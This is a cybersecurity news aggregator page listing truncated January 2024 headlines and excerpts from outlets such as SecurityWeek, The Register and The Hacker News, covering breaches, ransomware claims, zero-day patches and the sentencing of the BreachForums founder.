securityweek.com/loandepot-breach-16-6-million-people-impacted/ Category & Tags: Data Breaches,data breach,LoanDepot – Data Breaches,data breach,LoanDepot La entrada LoanDepot Breach: 16.6 Million People Impacted – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.securityweek.com – Author: Eduard Kovacs Varonis finds one vulnerability and three attack methods that can be used to obtain NTLM hashes via Outlook and two Windows programs. The post New NTLM Hash Leak Attacks Target Outlook, Windows Programs appeared first on SecurityWeek. Original Post URL:   show more ...

https://www.securityweek.com/new-ntlm-hash-leak-attacks-target-outlook-windows-programs/ Category & Tags: Identity & Access,Vulnerabilities,Microsoft Outlook,NTLM,vulnerabilities – […] La entrada New NTLM Hash Leak Attacks Target Outlook, Windows Programs – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BreachForums

Source: www.securityweek.com – Author: Ionut Arghire Conor Brian Fitzpatrick, the owner of the cybercrime website BreachForums, was sentenced to time served and supervised release. The post Owner of Cybercrime Website BreachForums Sentenced to Supervised Release appeared first on SecurityWeek. Original Post URL:   show more ...

https://www.securityweek.com/owner-of-cybercrime-website-breachforums-sentenced-to-supervised-release/ Category & Tags: Cybercrime,BreachForums,sentenced – Cybercrime,BreachForums,sentenced La entrada Owner of Cybercrime Website BreachForums Sentenced to Supervised Release – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 China

Source: www.securityweek.com – Author: Ionut Arghire CVE-2023-34048, a vCenter Server vulnerability patched in October 2023, had been exploited as zero-day for a year and a half. The post Chinese Spies Exploited VMware vCenter Server Vulnerability Since 2021 appeared first on SecurityWeek. Original Post URL:   show more ...

https://www.securityweek.com/chinese-spies-exploited-vmware-vcenter-server-vulnerability-since-2021/ Category & Tags: Nation-State,Vulnerabilities,China,China APT,exploited,VMware – Nation-State,Vulnerabilities,China,China APT,exploited,VMware La entrada Chinese Spies Exploited VMware vCenter Server Vulnerability Since 2021 – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 cookies

Source: www.securityweek.com – Author: AFP France’s data protection watchdog fines Yahoo 10 million euros for not respecting users’ refusals of internet-tracking “cookies” The post France Fines Yahoo 10 Mn Euros Over Cookie Abuses appeared first on SecurityWeek. Original Post URL:   show more ...

https://www.securityweek.com/france-fines-yahoo-10-mn-euros-over-cookie-abuses/ Category & Tags: Privacy,cookies,fine,privacy,Yahoo – Privacy,cookies,fine,privacy,Yahoo La entrada France Fines Yahoo 10 Mn Euros Over Cookie Abuses – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

Source: www.schneier.com – Author: Bruce Schneier HomeBlog Comments Tom • January 22, 2024 8:12 AM Something I’ve been expecting to see for a while now is LLM chatbots asking questions on sites like reddit and stack overflow so that the answers can be used to further train the model. But how would we know   show more ...

it […] La entrada AI Bots on X (Twitter) – Source: www.schneier.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: PRESS RELEASE SANTA CLARA, Calif., Jan. 22, 2024 /PRNewswire/ — Infoblox Inc., a leader in cloud networking and security services, today announces the appointment of Amy Farrow as Senior Vice President and Chief Information Officer. Infoblox leads the charge to   show more ...

unite networking and security to deliver improved performance and protection as the company continues to innovate […] La entrada Amy Farrow Joins Infoblox As Chief Information Officer – Source: www.darkreading.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cloud Security

Source: www.techrepublic.com – Author: Franklin Okeke We may earn from vendors via affiliate links or sponsorships. This might affect product placement on our site, but not the content of our reviews. See our Terms of Use for details. Looking for LastPass alternatives? Check out our list of the top password   show more ...

managers that offer secure and […] La entrada Top 6 LastPass Alternatives and Competitors for 2024 – Source: www.techrepublic.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Australia

Source: go.theregister.com – Author: Team Register Australia’s government has used the “significant cyber incidents” sanctions regime it introduced in 2021 for the first time, against a Russian named Aleksandr Gennadievich Ermakov whom authorities have deemed responsible for the 2022 attack on   show more ...

health insurer Medibank Private. The 2022 incident saw Medibank attacked by ransomware, and data […] La entrada Australia imposes cyber sanctions on Russian it says ransomwared health insurer – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 atlassian

Source: go.theregister.com – Author: Team Register More than 600 IP addresses are launching thousands of exploit attempts against CVE-2023-22527 – a critical bug in out–of-date versions of Atlassian Confluence Data Center and Server – according to non-profit security org Shadowserver. Atlassian disclosed   show more ...

the flaw, a template injection flaw that can allow unauthenticated remote code execution […] La entrada Atlassian Confluence Server RCE attacks underway from 600+ IPs – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Aerospace

Source: go.theregister.com – Author: Team Register AerCap, the world’s largest aircraft leasing company, has reported a ransomware infection that occurred earlier this month, but claims it hasn’t yet suffered any financial losses yet and all its systems are under control. In a US Securities and   show more ...

Exchange Commission (SEC) filing on Monday, the aerospace giant said […] La entrada Slug slimes aerospace biz AerCap with ransomware, brags about 1TB theft – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Team Register For a country that prides itself on being free, America does seem to have an awful lot of spying going on, as the new Street Surveillance Hub from the Electronic Frontier Foundation shows. The Hub contains detailed breakdowns of the type of surveillance systems   show more ...

used, from bodycams to biometrics, […] La entrada EFF adds Street Surveillance Hub so Americans can check who’s checking on them – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Team Register Critics are accusing major tech companies of not sticking to the rules when it comes to registering vulnerabilities with the appropriate authorities. Both Juniper Networks and Ivanti have attracted criticism from members of the infosec industry for the way   show more ...

they’ve handled the disclosure of vulnerabilities over the past week.  […] La entrada Ivanti and Juniper Networks accused of bending the rules with CVE assignments – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Team Register The LockBit ransomware gang is claiming an attack on submarine sandwich slinger Subway, alleging it has made off with a platter of data. LockBit’s post to its leak blog, published on January 21, suggests one of its affiliates breached Subway’s   show more ...

database, stealing sensitive data on “all financial aspects” of […] La entrada Subway’s data torpedoed by LockBit, ransomware gang claims – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BreachForums

Source: thehackernews.com – Author: . Jan 23, 2024NewsroomCyber Crime / Dark Web Conor Brian Fitzpatrick has been sentenced to time served and 20 years of supervised release for his role as the creator and administrator of BreachForums. Fitzpatrick, who went by the online alias “pompompurin,”   show more ...

was arrested in March 2023 in New York and was […] La entrada BreachForums Founder Sentenced to 20 Years of Supervised Release, No Jail Time – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 attacks

Source: thehackernews.com – Author: . Jan 23, 2024NewsroomVulnerability / Cyber Attack Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as   show more ...

CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers […] La entrada ~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Apple

Source: thehackernews.com – Author: . Jan 23, 2024NewsroomVulnerability / Device Security Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild. The issue, tracked as CVE-2024-23222, is   show more ...

a type confusion bug in the WebKit browser engine […] La entrada Apple Issues Patch for Critical Zero-Day in iPhones, Macs – Update Now – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2024-01
Aggregator history
Tuesday, January 23
MON
TUE
WED
THU
FRI
SAT
SUN
JanuaryFebruaryMarch